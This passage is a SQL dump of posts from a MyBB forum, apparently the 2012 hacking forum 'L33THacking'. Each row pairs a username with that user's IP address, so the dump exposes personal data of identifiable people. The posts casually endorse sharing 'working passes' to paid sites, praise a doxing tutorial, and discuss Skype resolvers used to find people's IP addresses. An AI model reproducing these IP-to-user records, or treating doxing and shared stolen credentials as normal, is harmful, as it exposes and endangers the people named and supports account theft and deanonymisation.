`subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5055', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '62', 'R?????zo?', '1350460970', 'Their forum is going down because our forum is better and he is just mad :P', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '6e5cef71819e369a176625276426aef5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5056', '821', '5013', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350461026', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5013\' dateline=\'1350448254\'] im thinking what i should post next [/quote] yeah that\'s a good idea :P I\'m thinking what I should post next too! Oh wait... I posted it', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'b9a94f03bc550dcc0cbdc768ccf44b17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5057', '896', '4892', '23', 'RE: How to secure your Router', '0', '62', 'R?????zo?', '1350461074', 'Nice tutorial bro, also lol @ first pic :D Keep them comming.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'ba3a843280c23bf253583a5da5c2c308', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5058', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '62', 'R?????zo?', '1350461137', 'I don\'t think I will be using W8, seems like it will be like Vista, full of worthless crap, bugs etc.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '3737537775ceb3efa49f9e83f2206847', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5059', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1350461211', '50 watergate lane No idea.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'e2113cc2e2f6ef91e610114afa5b1f6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5060', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '62', 'R?????zo?', '1350461301', 'I think I will pass, I\'m like the only one who lives in Europe and whenever I wake up I get spammed with 400 messages from 5hours ago :P So it\'s kinda useless for me.', '149.255.32.228', '-1778442012', '1', '0', '62', '1350461320', '1', '11f4c5066eed8f884dff18732a54f239', '0', '1350461320'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5061', '908', '4999', '54', '[17OCT]bangbros,mofos,pornpros,realitykings,vivid,naughtyamerica,brazzers and many', '0', '62', 'R?????zo?', '1350461363', 'thanks for contributing :) keep it up', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'c3b70f4ea82dd56bcd63d31231198b94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5062', '50', '132', '12', 'RE: [tut]How to DOX', '0', '62', 'R?????zo?', '1350461447', 'Nice guide, I will give it a try. I only knew about spokeo.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '17cddae4f09d0bf4bd76eaf4086aa6d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5063', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '62', 'R?????zo?', '1350461566', 'Hope he gets arrested, she was innocent. He just abused her basicly.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'f06e76e5655b76ad66d420025a0b8fe9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5064', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '62', 'R?????zo?', '1350461611', 'yeah seems like NXK\'s one.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'a4b1296709c8328161484de884c29bdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5065', '839', '4389', '54', '13.OKT]Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '62', 'R?????zo?', '1350461682', 'Thanks for the list bro. Keep them coming :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'f2fca7596cd3a6bff713c152af4736f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5066', '916', '0', '3', 'Subject too long', '0', '62', 'R?????zo?', '1350461871', 'So when a trhead subject is big with the 85 characters and whenever you try to reply you get this message: [img]http://i.imgur.com/Cx59N.png[/img] Because it add the \"RE: \" before the subject whenever you try to reply that\'s more 4 characters and becomes annoying because you can\'t use quick reply then. Can you please limit the thread subject to reply to 90 or something.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'c3c991cbccce1b3eb83f5af6b0de18ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5067', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '62', 'R?????zo?', '1350461932', 'yeah NASA gets hacked all the time, I don\'t know why they don\'t put effort in security that sht.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'c8abaaed726cfff04820741cab007843', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5068', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350462149', 'http://www.youtube.com/watch?v=VBAU26tN69M&feature=g-all-u', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '8ec9fc14d2afad6ba207cdba6d26d128', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5069', '899', '5052', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '53', 'sirchamp', '1350462914', '[quote=\'R?????zo?\' pid=\'5052\' dateline=\'1350460764\'] [quote=\'sirchamp\' pid=\'5047\' dateline=\'1350460098\'] I have my own skype resolver. You can send the usernamme of the guy you want to resolve. I will resolve him For free ;) [/quote] I think the point here is having a skype resolver of LH members, not your own :P [/quote] Your post doesn\'t make sense..', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', 'ecf77ef96a2792bee28b452cf4820c50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5070', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '62', 'R?????zo?', '1350463463', 'well what I mean is the point of this thread is having a skype resolver for LH members, not having you resolve each one if anyone wants.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'd1a82f3df08daf9f5fddf54aae70e0e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5071', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '53', 'sirchamp', '1350464649', 'Well I wont give mine. Free skype resolvers are rare. I was lucky to find one.', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '5d5b9559de62536053b42c80309351d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5072', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350466496', 'yeah maybe i should hack N.A.S.A if its thats easy lol its probably not but the password is probably POO HAH LOL', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '24cd080a1a60400ee9f2baf3e54bafd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5074', '896', '4892', '23', 'RE: How to secure your Router', '0', '264', 'D?ea', '1350469517', 'Thanks everybody! I loves to start my tutorials with a bit of fun, and then go over to serious.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '264fe72393e2f6d7f52f16314f8575ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5075', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '264', 'D?ea', '1350469601', 'Thanks everybody for the great welcome!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'd9e8edf5302197a2556cbd38ee54d8d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5076', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '264', 'D?ea', '1350469758', 'You should hack NASA, and put up a whitehat deface page, offering to help them securing safety.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5e69806af2754332ab9bbd9adb77e829', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5077', '916', '5066', '3', 'RE: Subject too long', '0', '264', 'D?ea', '1350469828', 'This is a common error, and can easy get fixed. If admin / owner needs help, feel free to PM me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '98261db4c08171bc3f32c79c76bfe608', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5078', '832', '5058', '25', 'RE: [News] Windows 8 security flaw', '0', '205', 'mothered', '1350470741', '[quote=\'R?????zo?\' pid=\'5058\' dateline=\'1350461137\'] I don\'t think I will be using W8, seems like it will be like Vista, full of worthless crap, bugs etc. [/quote] Windows 8 Is very stable, and It\'s overall functionality Is very responsive. There\'s security flaws In every O/S, but that doesn\'t render It as being crap.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5336300a82ad5c803bb5f9b12497b27d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5079', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '264', 'D?ea', '1350470807', 'Maybe I should start doing Journey.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'e721c9ea10dcc37a7b284b1cea4f1562', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5080', '916', '5066', '3', 'RE: Subject too long', '0', '205', 'mothered', '1350471069', 'I\'ve experienced the same thing, not only on this forum, but on others too. It\'ll be Interesting to know exactly what the cause Is.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4717e250842931512ce36fda815a41a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5081', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '205', 'mothered', '1350471245', 'I\'ve never come across that forum before. Just for a laugh, I\'ll check It out.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'bc1bb5da7196a58594de31051bdc7ddb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5082', '893', '4981', '77', 'RE: GamerTag Availability Checker Site', '0', '100', '??zg???g????61', '1350471578', '[quote=\'GlowingCapes\' pid=\'4981\' dateline=\'1350438661\'] Thanks! Just found out if my next gamertag name-change is available.. it is. ;) [/quote] ;D Glad I could help.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '90697641662310769888617fd6d5c084', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5083', '916', '5080', '3', 'RE: Subject too long', '0', '264', 'D?ea', '1350471727', '[quote=\'mothered\' pid=\'5080\' dateline=\'1350471069\'] I\'ve experienced the same thing, not only on this forum, but on others too. It\'ll be Interesting to know exactly what the cause Is. [/quote] It\'s because when a thread got the maximum 85 char\'s in subject. When you reply it automaticly adds RE: in front of it = the 85 char limit get\'s in use.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '533cc525014b903169eddb7da1019be6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5084', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '100', '??zg???g????61', '1350471987', 'Yeah I\'m afraid I\'m getting the same error as Jok3r and Relodzor', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9c86ddf9379129eec0b827fb26166144', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5085', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '100', '??zg???g????61', '1350472075', 'Hes like us in the perspective that he is a talented Social Engineer except he took his SE\'ing to a whole new level. Thats sick.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'f774d444de1b2f9689ca7a558ab00cd5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5086', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '100', '??zg???g????61', '1350472223', 'It just says \"IP Resolved: \" With no IP following.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '34eeb809562c19f6b0686d4026bd863d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5087', '917', '0', '7', 'Please help me', '0', '264', 'D?ea', '1350472978', 'http://kingofweb.com/users/nerdslegend Please go vote for me, you can vote 10 times for me a day, and it can help me improve my YouTube channel ALOT!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '276aea4db2ac867797e9060b67d97cb7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5088', '918', '0', '65', 'I feel famous', '0', '264', 'D?ea', '1350473034', 'Hello guys, I have uploaded this video to YouTube: http://www.youtube.com/watch?v=mIhiKMRM0xQ It did get stucked at 317 views after 5 minutes, and it is just growing 12 hours after upload it is stucked at 33k views! - It will soon update again, and I can\'t wait! [video=youtube]http://www.youtube.com/watch?v=mIhiKMRM0xQ[/video]', '178.157.194.171', '-1298283861', '1', '0', '264', '1350473052', '1', '4a856fe9121489cdc79687879a1d3fef', '0', '1350473052'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5089', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350474900', 'Thanks for the feedback :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89a64ead9e1f0bbdcd3d234c5747c6ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5090', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1350474941', 'Your avatar image is broken. Or, it\'s just me...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '62ecc61835a680ab63dd17033c839a9a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5091', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350474985', 'You host it, you can\'t participate in it. :p I don\'t know. There was one a while ago. But I won it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '028d055ffbe7b94e7632e4ec4822cff0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5092', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1350475015', 'Welcome to the forums everyone. ^ t3h jok3r. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32d5c363a63a199f873cdcfddae9c760', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5093', '126', '315', '15', 'RE: Adf.ly Bot', '0', '82', 'iTzIpod', '1350475124', 'Wait so this works 100% virus free? And should I run it in Sandboxie?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1cb3939114659c0715e65356487fccc8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5094', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '82', 'iTzIpod', '1350475182', 'Best video on Youtube. Her interview reaction: It was like Mortal Kombat. And it hurt. Or something along those lines :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '874b5746d5a00965ac13abc3a993abe0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5095', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '67', 'HoverCatz', '1350475251', 'May i have this? .', '193.161.89.201', '-1046390327', '1', '0', '0', '0', '1', '2dae2f70b5da450b88cfd9a86b3b5f3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5096', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '61', 'NXK', '1350475280', 'It says demo in the title.. It\'s not suposed to work.. All i said was it may work..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '930e55a0a9df0c3c6b878b82fffb044d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5097', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '2', 'Apathy', '1350475873', 'I would like this thanks. :P', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '212280f3a5e5a7a3281edaa78c34ad49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5098', '910', '5021', '49', 'RE: Referral Contest?', '0', '2', 'Apathy', '1350476021', 'It could be a collective of people pitching in for the prizes. The more people the more money.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', 'c2b4d8fc4c4d21d6e909bfd684e14dba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5099', '919', '0', '7', '[Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350477472', '[align=center][b][size=large]This is 100% legit, and is not on anyway grey or blackhat.[/size][/b] [b]First of all, create an account on:[/b] http://www.artscow.com/ [b]When you\'ve got an account go to:[/b] http://www.artscow.com/photo-gifts/mousepad/large-mousepad-160 - [i]And create your custom mousepad.[/i] [b]When you have created it, checkout and then there will be a place saying discount codes, or something similar, type in this code:[/b] [u]Z099PLAYVJVGY[/u] - [i]Now the price will be lowered to only $1 and free shipping![/i] [/align]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '8538f272ded77b6eda1197215aa1d2a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5100', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '67', 'HoverCatz', '1350480100', 'New info: http://pastebin.com/X4pd8bLM, http://pastebin.com/L0FfyFK1', '193.161.89.204', '-1046390324', '1', '0', '67', '1350480183', '1', '415c2ec357f6af0a441af2d5d6723ce1', '0', '1350480183'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5101', '916', '5083', '3', 'RE: Subject too long', '0', '62', 'R?????zo?', '1350482342', '[quote=\'D?ea\' pid=\'5083\' dateline=\'1350471727\'] [quote=\'mothered\' pid=\'5080\' dateline=\'1350471069\'] I\'ve experienced the same thing, not only on this forum, but on others too. It\'ll be Interesting to know exactly what the cause Is. [/quote] It\'s because when a thread got the maximum 85 char\'s in subject. When you reply it automaticly adds RE: in front of it = the 85 char limit get\'s in use. [/quote] exactly, should be easy to fix though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '19cfbfb1af611e515e570973af0bc55f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5102', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350482413', 'Is that you btw? I\'ve no idea :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e815524f9fbd309a2ee6c05e7550aaf2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5103', '918', '5102', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350482732', '[quote=\'R?????zo?\' pid=\'5102\' dateline=\'1350482413\'] Is that you btw? I\'ve no idea :P [/quote] It\'s my channel, yes.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'd71ee17d50ec281e9ac30dd61af4d47b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5104', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '61', 'NXK', '1350487977', 